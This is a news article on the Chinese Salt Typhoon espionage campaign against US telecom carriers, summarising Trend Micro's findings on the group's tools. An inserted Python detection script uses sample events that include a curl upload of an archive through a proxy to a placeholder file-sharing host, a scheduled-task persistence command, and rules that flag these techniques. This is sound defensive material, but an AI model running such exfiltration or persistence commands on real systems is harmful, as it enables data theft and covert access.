US telecommunications giant T-Mobile confirmed that it was also among the companies targeted by Chinese threat actors seeking access to valuable information.
The adversaries, tracked as Salt Typhoon, breached the company as part of a “month-long campaign” designed to collect the mobile communications of “high-profile intelligence targets.” It is unclear what, if any, information was obtained during the malicious activity.
“T-Mobile is closely monitoring this industry-wide attack, and at this time T-Mobile’s systems and data have not been significantly impacted, and we have no evidence of impact to customer information,” a company spokesperson said, as quoted by The Wall Street Journal. “We will continue to monitor this closely, working with industry colleagues and the relevant authorities.”
With the latest development, T-Mobile joins a list of major organizations like AT&T, Verizon and Lumen Technologies that have been singled out as part of what appears to be a full-scale cyber espionage campaign.
So far, reports have not indicated how successful these attacks were, whether any malware was installed, or what information the attackers were after. Salt Typhoon’s unauthorized access to Americans’ cellular data records was previously reported by Politico.
Last week, the US government said an ongoing investigation into an attack on commercial telecommunications infrastructure had revealed a “broad and significant” breach orchestrated by the People’s Republic of China (PRC).
“China-linked actors have compromised networks at numerous telecommunications companies to enable data theft of customer records, the compromise of private communications of a limited number of individuals primarily involved in government or political activities, and the copying of certain information that was subject to US law enforcement requests in accordance with court rulings,” the statement said.
It also warned that the extent and scope of those compromises could grow as the investigation continues.
Salt Typhoon, which is also known as Earth Estries, FamousSparrow, GhostEmperor and UNC2286, has been active since at least 2020, according to Trend Micro. In August 2023, the espionage group was linked to a series of attacks targeting government and technology industries based in the Philippines, Taiwan, Malaysia, South Africa, Germany and the US.
Analysis shows that threat actors methodically crafted their payloads and used an interesting mix of legitimate and ad hoc tools and techniques to bypass defenses and maintain access to their targets.
“Earth Estries remains persistent by constantly updating its tools and using backdoors for lateral movement and credential theft,” Trend Micro researchers Ted Lee, Leon Chang, and Lennart Bermejo said in a comprehensive analysis published earlier this month.
“Data collection and cleaning is done with TrillClient, while tools like cURL are used to send information to anonymous file sharing services using proxies to hide backdoor traffic.”
The cybersecurity company said it observed two different attack chains used by the group, indicating that Salt Typhoon’s tradecraft is as broad as it is diverse. Initial access to target networks is gained by exploiting vulnerabilities in external-facing services or remote control utilities.
In one set of attacks, the threat actor was found to be using vulnerable or misconfigured QConvergeConsole installations to deliver malware such as Cobalt Strike, a Go-based credential stealer called TrillClient, and backdoors like HemiGate and Crowdoor, a variant of SparrowDoor previously used by another China-linked group called Tropic Trooper.
Some of the other methods include using PsExec to install backdoors and tools laterally, and TrillClient to harvest user credentials from web browser user profiles and send them to an attacker-controlled Gmail account via Simple Mail Transfer Protocol (SMTP) for further use.
In contrast, the second infection sequence is much more complex: the threat actors abuse susceptible Microsoft Exchange servers to implant the China Chopper web shell, which is then used to deploy Cobalt Strike, Zingdoor, and Snappy (aka Deed RAT), the suspected successor to the ShadowPad malware.
“Delivery of these additional backdoors and tools is done either through the (command and control) server or by using cURL to download them from servers controlled by the attacker,” the researchers said. “These backdoors are also periodically replaced and updated.”
“Documents of interest are collected via RAR and exfiltrated using cURL, with the data sent to anonymous file sharing services.”
The attacks also use programs such as NinjaCopy for credential harvesting and PortScan for network discovery and mapping. Persistence on hosts is achieved using scheduled tasks.
In one instance, Salt Typhoon is believed to have repurposed the victim’s proxy server to redirect traffic to the actual command-and-control (C2) server in an attempt to hide the malicious traffic.
Trend Micro noted that one of the infected machines also had two additional backdoors called Cryptmerlin, which executes additional commands issued by the C2 server, and FuxosDoor, an Internet Information Services (IIS) implant that is deployed on the compromised Exchange server and is also designed to run commands using cmd.exe.
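The tradecraft described in the preceding paragraphs (an IIS implant running cmd.exe on an Exchange server, cURL uploads to file-sharing services through proxies, PsExec for lateral tool deployment, scheduled tasks for persistence) maps to a handful of host-level detections. The following is an added example, not code from the article or from Trend Micro: a toy detection pass over constructed, Sysmon-style process-creation events (the event field names and the sample paths are assumptions).

```python
"""Toy detection pass for the Earth Estries / Salt Typhoon host tradecraft
described above. Events are constructed samples, not real telemetry; the
Image / ParentImage / CommandLine field names follow Sysmon event 1 (assumption)."""
import re

# Constructed sample events: four that match a described technique, one benign.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",            # IIS worker spawning a shell
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"Image": r"C:\Tools\curl.exe",                      # upload of an archive via a proxy
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "curl.exe -x http://10.0.0.5:8080 -F file=@docs.rar https://share.example/upload"},
    {"Image": r"C:\Windows\System32\schtasks.exe",       # scheduled-task persistence
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "schtasks /create /sc minute /mo 30 /tn Updater /tr C:\\ProgramData\\svc.exe"},
    {"Image": r"C:\Windows\PSEXESVC.exe",                # PsExec service on a remote host
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": "PSEXESVC.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",        # benign control event
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe report.txt"},
]

UPLOAD_FLAGS = re.compile(r"(?:^|\s)(-F|-T|--upload-file|-d|--data\S*)\b")
PROXY_FLAGS = re.compile(r"(?:^|\s)(-x|--proxy)\b")

# Each rule is (name, predicate over one event). Names are descriptive, not vendor IDs.
RULES = [
    ("iis_spawns_shell", lambda e: e["ParentImage"].lower().endswith("\\w3wp.exe")
        and e["Image"].lower().endswith(("\\cmd.exe", "\\powershell.exe"))),
    ("curl_upload", lambda e: e["Image"].lower().endswith("\\curl.exe")
        and UPLOAD_FLAGS.search(e["CommandLine"]) is not None),
    ("scheduled_task_persistence", lambda e: e["Image"].lower().endswith("\\schtasks.exe")
        and re.search(r"/create\b", e["CommandLine"], re.I) is not None),
    ("psexec_service", lambda e: e["Image"].lower().endswith("\\psexesvc.exe")),
]


def evaluate(events):
    """Return a list of (rule_name, command_line, via_proxy) hits for the given events."""
    hits = []
    for e in events:
        for name, pred in RULES:
            if pred(e):
                hits.append((name, e["CommandLine"], PROXY_FLAGS.search(e["CommandLine"]) is not None))
    return hits


if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(hit)
```

The proxy flag is surfaced separately because the article describes both cURL uploads through proxies and a repurposed victim proxy in front of the C2; a curl upload that also sets a proxy deserves a higher severity than either signal alone.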
“Our analysis of Earth Estries’ persistent TTPs in sustained cyber operations reveals a sophisticated and adaptive threat actor using a variety of tools and backdoors, demonstrating not only technical capabilities but also a strategic approach to maintaining access and control in breached environments,” the researchers said.
“Throughout its campaigns, Earth Estries has demonstrated a deep understanding of its target environment, consistently identifying exposed layers for re-entry. Using a combination of known tools and special backdoors, they have created a multi-layered attack strategy that is difficult to detect and mitigate.”